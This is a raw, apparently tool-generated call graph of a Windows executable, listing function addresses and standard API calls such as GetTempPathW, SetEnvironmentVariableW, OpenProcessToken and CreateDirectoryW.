7ff6e60a2abb 16596->16597 16598 7ff6e60a2ac0 16597->16598 16599 7ff6e60a2af8 MessageBoxA 16597->16599 16600 7ff6e60a8ae0 54 API calls 16598->16600 16601 7ff6e60a2b12 16599->16601 16602 7ff6e60a2ada MessageBoxW 16600->16602 16603 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16601->16603 16602->16601 16604 7ff6e60a2b22 16603->16604 16604->16319 16606 7ff6e60a29fc GetLastError 16605->16606 16606->16589 16608 7ff6e60b4b1e 16607->16608 16609 7ff6e60b4b43 16608->16609 16610 7ff6e60b4b7f 16608->16610 16611 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16609->16611 16637 7ff6e60b2d50 16610->16637 16613 7ff6e60b4b6d 16611->16613 16615 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16613->16615 16618 7ff6e60a2a57 16615->16618 16616 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16616->16613 16617 7ff6e60b4c5c 16617->16616 16625 7ff6e60a8560 16618->16625 16619 7ff6e60b4c80 16619->16617 16622 7ff6e60b4c8a 16619->16622 16620 7ff6e60b4c31 16623 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16620->16623 16621 7ff6e60b4c28 16621->16617 16621->16620 16624 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16622->16624 16623->16613 16624->16613 16626 7ff6e60a856c 16625->16626 16627 7ff6e60a8587 GetLastError 16626->16627 16628 7ff6e60a858d FormatMessageW 16626->16628 16627->16628 16629 7ff6e60a85c0 16628->16629 16630 7ff6e60a85dc WideCharToMultiByte 16628->16630 16631 7ff6e60a29e0 54 API calls 16629->16631 16632 7ff6e60a85d3 16630->16632 16633 7ff6e60a8616 16630->16633 16631->16632 16635 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16632->16635 16634 7ff6e60a29e0 54 API calls 16633->16634 16634->16632 16636 7ff6e60a2a5e 16635->16636 16636->16594 16638 7ff6e60b2d8e 16637->16638 16639 7ff6e60b2d7e 16637->16639 16640 7ff6e60b2d97 16638->16640 16644 7ff6e60b2dc5 16638->16644 16643 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16639->16643 16641 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16640->16641 16642 7ff6e60b2dbd 16641->16642 16642->16617 16642->16619 16642->16620 16642->16621 16643->16642 16644->16639 16644->16642 16647 7ff6e60b3074 16644->16647 16651 7ff6e60b36e0 16644->16651 16677 7ff6e60b33a8 16644->16677 16707 7ff6e60b2c30 16644->16707 16710 7ff6e60b4900 16644->16710 16649 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16647->16649 16649->16639 16652 7ff6e60b3795 16651->16652 16653 7ff6e60b3722 16651->16653 16656 7ff6e60b37ef 16652->16656 16657 7ff6e60b379a 16652->16657 16654 7ff6e60b37bf 16653->16654 16655 7ff6e60b3728 16653->16655 16734 7ff6e60b1c90 16654->16734 16662 7ff6e60b372d 16655->16662 16665 7ff6e60b37fe 16655->16665 16656->16654 16656->16665 16675 7ff6e60b3758 16656->16675 16658 7ff6e60b37cf 16657->16658 16659 7ff6e60b379c 16657->16659 16741 7ff6e60b1880 16658->16741 16664 7ff6e60b37ab 16659->16664 16668 7ff6e60b373d 16659->16668 16666 7ff6e60b3770 16662->16666 16662->16668 16662->16675 16664->16654 16669 7ff6e60b37b0 16664->16669 16676 7ff6e60b382d 16665->16676 16748 7ff6e60b20a0 16665->16748 16666->16676 16726 7ff6e60b4500 16666->16726 16668->16676 16716 7ff6e60b4044 16668->16716 16669->16676 16730 7ff6e60b4698 16669->16730 16671 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16673 7ff6e60b3ac3 16671->16673 16673->16644 16675->16676 16755 7ff6e60bee18 16675->16755 16676->16671 16678 7ff6e60b33b3 16677->16678 16679 7ff6e60b33c9 16677->16679 16681 7ff6e60b3795 16678->16681 16682 7ff6e60b3722 16678->16682 16698 7ff6e60b3407 16678->16698 16680 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16679->16680 16679->16698 16680->16698 16683 7ff6e60b379a 16681->16683 16689 7ff6e60b37ef 16681->16689 16684 7ff6e60b37bf 16682->16684 16685 7ff6e60b3728 16682->16685 16686 7ff6e60b37cf 16683->16686 16687 7ff6e60b379c 16683->16687 16690 7ff6e60b1c90 38 API calls 16684->16690 16693 7ff6e60b37fe 16685->16693 16694 7ff6e60b372d 16685->16694 16691 7ff6e60b1880 38 API calls 16686->16691 16688 7ff6e60b373d 16687->16688 16695 7ff6e60b37ab 16687->16695 16692 7ff6e60b4044 47 API calls 16688->16692 16706 7ff6e60b382d 16688->16706 16689->16684 16689->16693 16705 7ff6e60b3758 16689->16705 16690->16705 16691->16705 16692->16705 16697 7ff6e60b20a0 38 API calls 16693->16697 16693->16706 16694->16688 16696 7ff6e60b3770 16694->16696 16694->16705 16695->16684 16699 7ff6e60b37b0 16695->16699 16700 7ff6e60b4500 47 API calls 16696->16700 16696->16706 16697->16705 16698->16644 16702 7ff6e60b4698 37 API calls 16699->16702 16699->16706 16700->16705 16701 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16703 7ff6e60b3ac3 16701->16703 16702->16705 16703->16644 16704 7ff6e60bee18 47 API calls 16704->16705 16705->16704 16705->16706 16706->16701 16892 7ff6e60b0e54 16707->16892 16711 7ff6e60b4917 16710->16711 16909 7ff6e60bdf78 16711->16909 16717 7ff6e60b4066 16716->16717 16765 7ff6e60b0cc0 16717->16765 16722 7ff6e60b4900 45 API calls 16723 7ff6e60b41a3 16722->16723 16724 7ff6e60b4900 45 API calls 16723->16724 16725 7ff6e60b422c 16723->16725 16724->16725 16725->16675 16727 7ff6e60b4518 16726->16727 16729 7ff6e60b4580 16726->16729 16728 7ff6e60bee18 47 API calls 16727->16728 16727->16729 16728->16729 16729->16675 16731 7ff6e60b46b9 16730->16731 16732 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16731->16732 16733 7ff6e60b46ea 16731->16733 16732->16733 16733->16675 16735 7ff6e60b1cc3 16734->16735 16736 7ff6e60b1cf2 16735->16736 16738 7ff6e60b1daf 16735->16738 16737 7ff6e60b0cc0 12 API calls 16736->16737 16739 7ff6e60b1d2f 16736->16739 16737->16739 16740 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16738->16740 16739->16675 16740->16739 16742 7ff6e60b18b3 16741->16742 16743 7ff6e60b18e2 16742->16743 16745 7ff6e60b199f 16742->16745 16744 7ff6e60b0cc0 12 API calls 16743->16744 16747 7ff6e60b191f 16743->16747 16744->16747 16746 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16745->16746 16746->16747 16747->16675 16749 7ff6e60b20d3 16748->16749 16750 7ff6e60b2102 16749->16750 16752 7ff6e60b21bf 16749->16752 16751 7ff6e60b0cc0 12 API calls 16750->16751 16754 7ff6e60b213f 16750->16754 16751->16754 16753 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16752->16753 16753->16754 16754->16675 16756 7ff6e60bee40 16755->16756 16757 7ff6e60bee85 16756->16757 16759 7ff6e60b4900 45 API calls 16756->16759 16760 7ff6e60bee45 __scrt_get_show_window_mode 16756->16760 16761 7ff6e60bee6e __scrt_get_show_window_mode 16756->16761 16757->16760 16757->16761 16762 7ff6e60c04c8 WideCharToMultiByte 16757->16762 16758 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16758->16760 16759->16757 16760->16675 16761->16758 16761->16760 16763 7ff6e60bef61 16762->16763 16763->16760 16764 7ff6e60bef76 GetLastError 16763->16764 16764->16760 16764->16761 16766 7ff6e60b0cf7 16765->16766 16772 7ff6e60b0ce6 16765->16772 16767 7ff6e60bdbbc _fread_nolock 12 API calls 16766->16767 16766->16772 16768 7ff6e60b0d24 16767->16768 16769 7ff6e60b0d38 16768->16769 16771 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16768->16771 16770 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16769->16770 16770->16772 16771->16769 16773 7ff6e60beb30 16772->16773 16774 7ff6e60beb80 16773->16774 16775 7ff6e60beb4d 16773->16775 16774->16775 16778 7ff6e60bebb2 16774->16778 16776 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16775->16776 16777 7ff6e60b4181 16776->16777 16777->16722 16777->16723 16783 7ff6e60becc5 16778->16783 16788 7ff6e60bebfa 16778->16788 16779 7ff6e60bedb7 16819 7ff6e60be01c 16779->16819 16781 7ff6e60bed7d 16812 7ff6e60be3b4 16781->16812 16783->16779 16783->16781 16784 7ff6e60bed4c 16783->16784 16785 7ff6e60bed0f 16783->16785 16787 7ff6e60bed05 16783->16787 16805 7ff6e60be694 16784->16805 16795 7ff6e60be8c4 16785->16795 16787->16781 16790 7ff6e60bed0a 16787->16790 16788->16777 16791 7ff6e60baa3c __std_exception_copy 37 API calls 16788->16791 16790->16784 16790->16785 16792 7ff6e60becb2 16791->16792 16792->16777 16793 7ff6e60baec4 _wfindfirst32i64 17 API calls 16792->16793 16794 7ff6e60bee14 16793->16794 16828 7ff6e60c471c 16795->16828 16799 7ff6e60be96c 16800 7ff6e60be9c1 16799->16800 16802 7ff6e60be98c 16799->16802 16804 7ff6e60be970 16799->16804 16881 7ff6e60be4b0 16800->16881 16877 7ff6e60be76c 16802->16877 16804->16777 16806 7ff6e60c471c 38 API calls 16805->16806 16807 7ff6e60be6de 16806->16807 16808 7ff6e60c4164 37 API calls 16807->16808 16809 7ff6e60be72e 16808->16809 16810 7ff6e60be732 16809->16810 16811 7ff6e60be76c 45 API calls 16809->16811 16810->16777 16811->16810 16813 7ff6e60c471c 38 API calls 16812->16813 16814 7ff6e60be3ff 16813->16814 16815 7ff6e60c4164 37 API calls 16814->16815 16816 7ff6e60be457 16815->16816 16817 7ff6e60be45b 16816->16817 16818 7ff6e60be4b0 45 API calls 16816->16818 16817->16777 16818->16817 16820 7ff6e60be061 16819->16820 16821 7ff6e60be094 16819->16821 16823 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16820->16823 16822 7ff6e60be0ac 16821->16822 16825 7ff6e60be12d 16821->16825 16824 7ff6e60be3b4 46 API calls 16822->16824 16827 7ff6e60be08d __scrt_get_show_window_mode 16823->16827 16824->16827 16826 7ff6e60b4900 45 API calls 16825->16826 16825->16827 16826->16827 16827->16777 16829 7ff6e60c476f fegetenv 16828->16829 16830 7ff6e60c867c 37 API calls 16829->16830 16836 7ff6e60c47c2 16830->16836 16831 7ff6e60c47ef 16835 7ff6e60baa3c __std_exception_copy 37 API calls 16831->16835 16832 7ff6e60c48b2 16833 7ff6e60c867c 37 API calls 16832->16833 16834 7ff6e60c48dc 16833->16834 16839 7ff6e60c867c 37 API calls 16834->16839 16840 7ff6e60c486d 16835->16840 16836->16832 16837 7ff6e60c47dd 16836->16837 16838 7ff6e60c488c 16836->16838 16837->16831 16837->16832 16843 7ff6e60baa3c __std_exception_copy 37 API calls 16838->16843 16841 7ff6e60c48ed 16839->16841 16842 7ff6e60c5994 16840->16842 16847 7ff6e60c4875 16840->16847 16844 7ff6e60c8870 20 API calls 16841->16844 16845 7ff6e60baec4 _wfindfirst32i64 17 API calls 16842->16845 16843->16840 16855 7ff6e60c4956 __scrt_get_show_window_mode 16844->16855 16846 7ff6e60c59a9 16845->16846 16848 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16847->16848 16849 7ff6e60be911 16848->16849 16873 7ff6e60c4164 16849->16873 16850 7ff6e60c4cff __scrt_get_show_window_mode 16851 7ff6e60c503f 16852 7ff6e60c4280 37 API calls 16851->16852 16859 7ff6e60c5757 16852->16859 16853 7ff6e60c4feb 16853->16851 16856 7ff6e60c59ac memcpy_s 37 API calls 16853->16856 16854 7ff6e60c4997 memcpy_s 16866 7ff6e60c52db memcpy_s __scrt_get_show_window_mode 16854->16866 16869 7ff6e60c4df3 memcpy_s __scrt_get_show_window_mode 16854->16869 16855->16850 16855->16854 16857 7ff6e60b54c4 _set_fmode 11 API calls 16855->16857 16856->16851 16858 7ff6e60c4dd0 16857->16858 16860 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 16858->16860 16861 7ff6e60c59ac memcpy_s 37 API calls 16859->16861 16867 7ff6e60c57b2 16859->16867 16860->16854 16861->16867 16862 7ff6e60c5938 16863 7ff6e60c867c 37 API calls 16862->16863 16863->16847 16864 7ff6e60b54c4 11 API calls _set_fmode 16864->16866 16865 7ff6e60b54c4 11 API calls _set_fmode 16865->16869 16866->16851 16866->16853 16866->16864 16872 7ff6e60baea4 37 API calls _invalid_parameter_noinfo 16866->16872 16867->16862 16868 7ff6e60c4280 37 API calls 16867->16868 16871 7ff6e60c59ac memcpy_s 37 API calls 16867->16871 16868->16867 16869->16853 16869->16865 16870 7ff6e60baea4 37 API calls _invalid_parameter_noinfo 16869->16870 16870->16869 16871->16867 16872->16866 16874 7ff6e60c4183 16873->16874 16875 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16874->16875 16876 7ff6e60c41ae memcpy_s 16874->16876 16875->16876 16876->16799 16878 7ff6e60be798 memcpy_s 16877->16878 16879 7ff6e60b4900 45 API calls 16878->16879 16880 7ff6e60be852 memcpy_s __scrt_get_show_window_mode 16878->16880 16879->16880 16880->16804 16882 7ff6e60be4eb 16881->16882 16887 7ff6e60be538 memcpy_s 16881->16887 16883 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16882->16883 16884 7ff6e60be517 16883->16884 16884->16804 16885 7ff6e60be5a3 16886 7ff6e60baa3c __std_exception_copy 37 API calls 16885->16886 16891 7ff6e60be5e5 memcpy_s 16886->16891 16887->16885 16888 7ff6e60b4900 45 API calls 16887->16888 16888->16885 16889 7ff6e60baec4 _wfindfirst32i64 17 API calls 16890 7ff6e60be690 16889->16890 16891->16889 16893 7ff6e60b0e81 16892->16893 16894 7ff6e60b0e93 16892->16894 16895 7ff6e60b54c4 _set_fmode 11 API calls 16893->16895 16897 7ff6e60b0ea0 16894->16897 16900 7ff6e60b0edd 16894->16900 16896 7ff6e60b0e86 16895->16896 16898 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 16896->16898 16899 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16897->16899 16905 7ff6e60b0e91 16898->16905 16899->16905 16901 7ff6e60b0f86 16900->16901 16903 7ff6e60b54c4 _set_fmode 11 API calls 16900->16903 16902 7ff6e60b54c4 _set_fmode 11 API calls 16901->16902 16901->16905 16904 7ff6e60b1030 16902->16904 16906 7ff6e60b0f7b 16903->16906 16907 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 16904->16907 16905->16644 16908 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 16906->16908 16907->16905 16908->16901 16910 7ff6e60bdf91 16909->16910 16911 7ff6e60b493f 16909->16911 16910->16911 16912 7ff6e60c3974 45 API calls 16910->16912 16913 7ff6e60bdfe4 16911->16913 16912->16911 16914 7ff6e60b494f 16913->16914 16915 7ff6e60bdffd 16913->16915 16914->16644 16915->16914 16916 7ff6e60c2cc0 45 API calls 16915->16916 16916->16914 16924 7ff6e60b536c EnterCriticalSection 16917->16924 16926 7ff6e60a28ac 16925->16926 16927 7ff6e60b4ac4 49 API calls 16926->16927 16928 7ff6e60a28fd 16927->16928 16929 7ff6e60b54c4 _set_fmode 11 API calls 16928->16929 16930 7ff6e60a2902 16929->16930 16944 7ff6e60b54e4 16930->16944 16933 7ff6e60a1ef0 49 API calls 16934 7ff6e60a2931 __scrt_get_show_window_mode 16933->16934 16935 7ff6e60a8ae0 57 API calls 16934->16935 16936 7ff6e60a2966 16935->16936 16937 7ff6e60a29a3 MessageBoxA 16936->16937 16938 7ff6e60a296b 16936->16938 16940 7ff6e60a29bd 16937->16940 16939 7ff6e60a8ae0 57 API calls 16938->16939 16941 7ff6e60a2985 MessageBoxW 16939->16941 16942 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16940->16942 16941->16940 16943 7ff6e60a29cd 16942->16943 16943->16332 16945 7ff6e60bb888 _set_fmode 11 API calls 16944->16945 16946 7ff6e60b54fb 16945->16946 16947 7ff6e60bf158 _set_fmode 11 API calls 16946->16947 16948 7ff6e60b553b 16946->16948 16953 7ff6e60a2909 16946->16953 16949 7ff6e60b5530 16947->16949 16948->16953 16956 7ff6e60bf828 16948->16956 16950 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16949->16950 16950->16948 16953->16933 16954 7ff6e60baec4 _wfindfirst32i64 17 API calls 16955 7ff6e60b5580 16954->16955 16959 7ff6e60bf845 16956->16959 16957 7ff6e60bf84a 16958 7ff6e60b54c4 _set_fmode 11 API calls 16957->16958 16960 7ff6e60b5561 16957->16960 16961 7ff6e60bf854 16958->16961 16959->16957 16959->16960 16963 7ff6e60bf894 16959->16963 16960->16953 16960->16954 16962 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 16961->16962 16962->16960 16963->16960 16964 7ff6e60b54c4 _set_fmode 11 API calls 16963->16964 16964->16961 16966 7ff6e60a8c14 WideCharToMultiByte 16965->16966 16967 7ff6e60a8c82 WideCharToMultiByte 16965->16967 16969 7ff6e60a8c3e 16966->16969 16970 7ff6e60a8c55 16966->16970 16968 7ff6e60a8caf 16967->16968 16972 7ff6e60a3f25 16967->16972 16971 7ff6e60a29e0 57 API calls 16968->16971 16973 7ff6e60a29e0 57 API calls 16969->16973 16970->16967 16974 7ff6e60a8c6b 16970->16974 16971->16972 16972->16343 16972->16345 16973->16972 16975 7ff6e60a29e0 57 API calls 16974->16975 16975->16972 16977 7ff6e60ba9b3 16976->16977 16980 7ff6e60a7bde 16976->16980 16978 7ff6e60baa3c __std_exception_copy 37 API calls 16977->16978 16977->16980 16979 7ff6e60ba9e0 16978->16979 16979->16980 16981 7ff6e60baec4 _wfindfirst32i64 17 API calls 16979->16981 16980->16360 16982 7ff6e60baa10 16981->16982 16984 7ff6e60a3fd0 116 API calls 16983->16984 16985 7ff6e60a1ad6 16984->16985 16986 7ff6e60a1c84 16985->16986 16987 7ff6e60a82b0 83 API calls 16985->16987 16988 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16986->16988 16989 7ff6e60a1b0e 16987->16989 16990 7ff6e60a1c98 16988->16990 17014 7ff6e60a1b3f 16989->17014 17022 7ff6e60b0814 16989->17022 16990->16380 17016 7ff6e60a3e40 16990->17016 16992 7ff6e60b018c 74 API calls 16992->16986 16993 7ff6e60a1b28 16994 7ff6e60a1b44 16993->16994 16995 7ff6e60a1b2c 16993->16995 17026 7ff6e60b04dc 16994->17026 16996 7ff6e60a2890 59 API calls 16995->16996 16996->17014 16999 7ff6e60a1b5f 17001 7ff6e60a2890 59 API calls 16999->17001 17000 7ff6e60a1b77 17002 7ff6e60b0814 73 API calls 17000->17002 17001->17014 17003 7ff6e60a1bc4 17002->17003 17004 7ff6e60a1bee 17003->17004 17005 7ff6e60a1bd6 17003->17005 17007 7ff6e60b04dc _fread_nolock 53 API calls 17004->17007 17006 7ff6e60a2890 59 API calls 17005->17006 17006->17014 17008 7ff6e60a1c03 17007->17008 17009 7ff6e60a1c1e 17008->17009 17010 7ff6e60a1c09 17008->17010 17029 7ff6e60b0250 17009->17029 17012 7ff6e60a2890 59 API calls 17010->17012 17012->17014 17014->16992 17015 7ff6e60a2b30 59 API calls 17015->17014 17017 7ff6e60a1ef0 49 API calls 17016->17017 17018 7ff6e60a3e5d 17017->17018 17018->16379 17020 7ff6e60a1ef0 49 API calls 17019->17020 17021 7ff6e60a4080 17020->17021 17021->16380 17023 7ff6e60b0844 17022->17023 17035 7ff6e60b05a4 17023->17035 17025 7ff6e60b085d 17025->16993 17047 7ff6e60b04fc 17026->17047 17030 7ff6e60b0259 17029->17030 17034 7ff6e60a1c32 17029->17034 17031 7ff6e60b54c4 _set_fmode 11 API calls 17030->17031 17034->17014 17034->17015 17036 7ff6e60b060e 17035->17036 17037 7ff6e60b05ce 17035->17037 17036->17037 17039 7ff6e60b061a 17036->17039 17038 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 17037->17038 17041 7ff6e60b05f5 17038->17041 17046 7ff6e60b536c EnterCriticalSection 17039->17046 17041->17025 17048 7ff6e60a1b59 17047->17048 17049 7ff6e60b0526 17047->17049 17048->16999 17048->17000 17049->17048 17050 7ff6e60b0535 __scrt_get_show_window_mode 17049->17050 17051 7ff6e60b0572 17049->17051 17053 7ff6e60b54c4 _set_fmode 11 API calls 17050->17053 17060 7ff6e60b536c EnterCriticalSection 17051->17060 17055 7ff6e60b054a 17053->17055 17057 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 17055->17057 17057->17048 17062 7ff6e60a7966 17061->17062 17063 7ff6e60a798a 17062->17063 17064 7ff6e60a79dd GetTempPathW 17062->17064 17066 7ff6e60a7b60 61 API calls 17063->17066 17065 7ff6e60a79f2 17064->17065 17100 7ff6e60a2830 17065->17100 17067 7ff6e60a7996 17066->17067 17124 7ff6e60a7420 17067->17124 17073 7ff6e60abcc0 _wfindfirst32i64 8 API calls 17074 7ff6e60a154f 17073->17074 17074->16386 17074->16390 17076 7ff6e60a79bc __std_exception_copy 17076->17064 17078 7ff6e60a79ca 17076->17078 17077 7ff6e60a7ab6 17080 7ff6e60a8bf0 59 API calls 17077->17080 17084 7ff6e60a7ac7 __std_exception_copy 17080->17084 17081 7ff6e60a7a0b __std_exception_copy 17081->17077 17083 7ff6e60a7a41 17081->17083 17104 7ff6e60b8aa4 17081->17104 17107 7ff6e60a8950 17081->17107 17085 7ff6e60a8ae0 57 API calls 17083->17085 17099 7ff6e60a7a7a __std_exception_copy 17083->17099 17086 7ff6e60a8ae0 57 API calls 17084->17086 17084->17099 17087 7ff6e60a7a57 17085->17087 17090 7ff6e60a7ae5 17086->17090 17088 7ff6e60a7a99 SetEnvironmentVariableW 17087->17088 17089 7ff6e60a7a5c 17087->17089 17088->17099 17091 7ff6e60a8ae0 57 API calls 17089->17091 17092 7ff6e60a7aea 17090->17092 17093 7ff6e60a7b1d SetEnvironmentVariableW 17090->17093 17094 7ff6e60a7a6c 17091->17094 17095 7ff6e60a8ae0 57 API calls 17092->17095 17093->17099 17096 7ff6e60b7dec 38 API calls 17094->17096 17097 7ff6e60a7afa 17095->17097 17096->17099 17098 7ff6e60b7dec 38 API calls 17097->17098 17098->17099 17099->17073 17101 7ff6e60a2855 17100->17101 17158 7ff6e60b4d18 17101->17158 17349 7ff6e60b86d0 17104->17349 17108 7ff6e60abc60 17107->17108 17109 7ff6e60a8960 GetCurrentProcess OpenProcessToken 17108->17109 17110 7ff6e60a89ab GetTokenInformation 17109->17110 17112 7ff6e60a8a21 __std_exception_copy 17109->17112 17111 7ff6e60a89cd GetLastError 17110->17111 17113 7ff6e60a89d8 17110->17113 17111->17112 17111->17113 17114 7ff6e60a8a34 CloseHandle 17112->17114 17115 7ff6e60a8a3a 17112->17115 17113->17112 17116 7ff6e60a89ee GetTokenInformation 17113->17116 17114->17115 17475 7ff6e60a8650 17115->17475 17116->17112 17119 7ff6e60a8a14 ConvertSidToStringSidW 17116->17119 17119->17112 17125 7ff6e60a742c 17124->17125 17126 7ff6e60a8ae0 57 API calls 17125->17126 17127 7ff6e60a744e 17126->17127 17128 7ff6e60a7456 17127->17128 17129 7ff6e60a7469 ExpandEnvironmentStringsW 17127->17129 17130 7ff6e60a2b30 59 API calls 17128->17130 17131 7ff6e60a748f __std_exception_copy 17129->17131 17132 7ff6e60a7462 17130->17132 17133 7ff6e60a7493 17131->17133 17134 7ff6e60a74a6 17131->17134 17136 7ff6e60abcc0 _wfindfirst32i64 8 API calls 17132->17136 17135 7ff6e60a2b30 59 API calls 17133->17135 17138 7ff6e60a74c0 17134->17138 17139 7ff6e60a74b4 17134->17139 17135->17132 17137 7ff6e60a7588 17136->17137 17137->17099 17148 7ff6e60b7dec 17137->17148 17486 7ff6e60b6328 17138->17486 17479 7ff6e60b79a4 17139->17479 17142 7ff6e60a74be 17143 7ff6e60a74da 17142->17143 17146 7ff6e60a74ed __scrt_get_show_window_mode 17142->17146 17144 7ff6e60a2b30 59 API calls 17143->17144 17144->17132 17145 7ff6e60a7562 CreateDirectoryW 17145->17132 17146->17145 17147 7ff6e60a753c CreateDirectoryW 17146->17147 17147->17146 17149 7ff6e60b7df9 17148->17149 17150 7ff6e60b7e0c 17148->17150 17151 7ff6e60b54c4 _set_fmode 11 API calls 17149->17151 17578 7ff6e60b7a70 17150->17578 17153 7ff6e60b7dfe 17151->17153 17155 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 17153->17155 17156 7ff6e60b7e0a 17155->17156 17156->17076 17159 7ff6e60b4d72 17158->17159 17160 7ff6e60b4d97 17159->17160 17161 7ff6e60b4dd3 17159->17161 17162 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 17160->17162 17176 7ff6e60b30d0 17161->17176 17165 7ff6e60b4dc1 17162->17165 17164 7ff6e60b4eb4 17167 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17164->17167 17166 7ff6e60abcc0 _wfindfirst32i64 8 API calls 17165->17166 17169 7ff6e60a2874 17166->17169 17167->17165 17169->17081 17170 7ff6e60b4e89 17173 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17170->17173 17171 7ff6e60b4eda 17171->17164 17172 7ff6e60b4ee4 17171->17172 17175 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17172->17175 17173->17165 17174 7ff6e60b4e80 17174->17164 17174->17170 17175->17165 17177 7ff6e60b310e 17176->17177 17178 7ff6e60b30fe 17176->17178 17179 7ff6e60b3117 17177->17179 17183 7ff6e60b3145 17177->17183 17180 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 17178->17180 17181 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 17179->17181 17182 7ff6e60b313d 17180->17182 17181->17182 17182->17164 17182->17170 17182->17171 17182->17174 17183->17178 17183->17182 17187 7ff6e60b3ae4 17183->17187 17220 7ff6e60b3530 17183->17220 17257 7ff6e60b2cc0 17183->17257 17188 7ff6e60b3b26 17187->17188 17189 7ff6e60b3b97 17187->17189 17192 7ff6e60b3bc1 17188->17192 17193 7ff6e60b3b2c 17188->17193 17190 7ff6e60b3bf0 17189->17190 17191 7ff6e60b3b9c 17189->17191 17198 7ff6e60b3c07 17190->17198 17200 7ff6e60b3bfa 17190->17200 17205 7ff6e60b3bff 17190->17205 17196 7ff6e60b3bd1 17191->17196 17197 7ff6e60b3b9e 17191->17197 17276 7ff6e60b1e94 17192->17276 17194 7ff6e60b3b60 17193->17194 17195 7ff6e60b3b31 17193->17195 17201 7ff6e60b3b37 17194->17201 17194->17205 17195->17198 17195->17201 17283 7ff6e60b1a84 17196->17283 17199 7ff6e60b3b40 17197->17199 17210 7ff6e60b3bad 17197->17210 17290 7ff6e60b47ec 17198->17290 17218 7ff6e60b3c30 17199->17218 17260 7ff6e60b4298 17199->17260 17200->17192 17200->17205 17201->17199 17206 7ff6e60b3b5b 17201->17206 17209 7ff6e60b3b72 17201->17209 17205->17218 17294 7ff6e60b22a4 17205->17294 17216 7ff6e60b4900 45 API calls 17206->17216 17206->17218 17219 7ff6e60b3e1c 17206->17219 17209->17218 17270 7ff6e60b45d4 17209->17270 17210->17192 17211 7ff6e60b3bb2 17210->17211 17215 7ff6e60b4698 37 API calls 17211->17215 17211->17218 17213 7ff6e60abcc0 _wfindfirst32i64 8 API calls 17214 7ff6e60b3f2a 17213->17214 17214->17183 17215->17206 17216->17219 17218->17213 17219->17218 17301 7ff6e60befc8 17219->17301 17221 7ff6e60b353e 17220->17221 17222 7ff6e60b3554 17220->17222 17224 7ff6e60b3594 17221->17224 17225 7ff6e60b3b26 17221->17225 17226 7ff6e60b3b97 17221->17226 17223 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 17222->17223 17222->17224 17223->17224 17224->17183 17229 7ff6e60b3bc1 17225->17229 17230 7ff6e60b3b2c 17225->17230 17227 7ff6e60b3bf0 17226->17227 17228 7ff6e60b3b9c 17226->17228 17235 7ff6e60b3c07 17227->17235 17237 7ff6e60b3bfa 17227->17237 17242 7ff6e60b3bff 17227->17242 17233 7ff6e60b3bd1 17228->17233 17234 7ff6e60b3b9e 17228->17234 17239 7ff6e60b1e94 38 API calls 17229->17239 17231 7ff6e60b3b60 17230->17231 17232 7ff6e60b3b31 17230->17232 17238 7ff6e60b3b37 17231->17238 17231->17242 17232->17235 17232->17238 17240 7ff6e60b1a84 38 API calls 17233->17240 17236 7ff6e60b3b40 17234->17236 17245 7ff6e60b3bad 17234->17245 17243 7ff6e60b47ec 45 API calls 17235->17243 17241 7ff6e60b4298 47 API calls 17236->17241 17252 7ff6e60b3c30 17236->17252 17237->17229 17237->17242 17238->17236 17246 7ff6e60b3b72 17238->17246 17253 7ff6e60b3b5b 17238->17253 17239->17253 17240->17253 17241->17253 17244 7ff6e60b22a4 38 API calls 17242->17244 17242->17252 17243->17253 17244->17253 17245->17229 17247 7ff6e60b3bb2 17245->17247 17248 7ff6e60b45d4 46 API calls 17246->17248 17246->17252 17250 7ff6e60b4698 37 API calls 17247->17250 17247->17252 17248->17253 17249 7ff6e60abcc0 _wfindfirst32i64 8 API calls 17251 7ff6e60b3f2a 17249->17251 17250->17253 17251->17183 17252->17249 17253->17252 17254 7ff6e60b3e1c 17253->17254 17255 7ff6e60b4900 45 API calls 17253->17255 17254->17252 17256 7ff6e60befc8 46 API calls 17254->17256 17255->17254 17256->17254 17332 7ff6e60b1108 17257->17332 17261 7ff6e60b42be 17260->17261 17262 7ff6e60b0cc0 12 API calls 17261->17262 17263 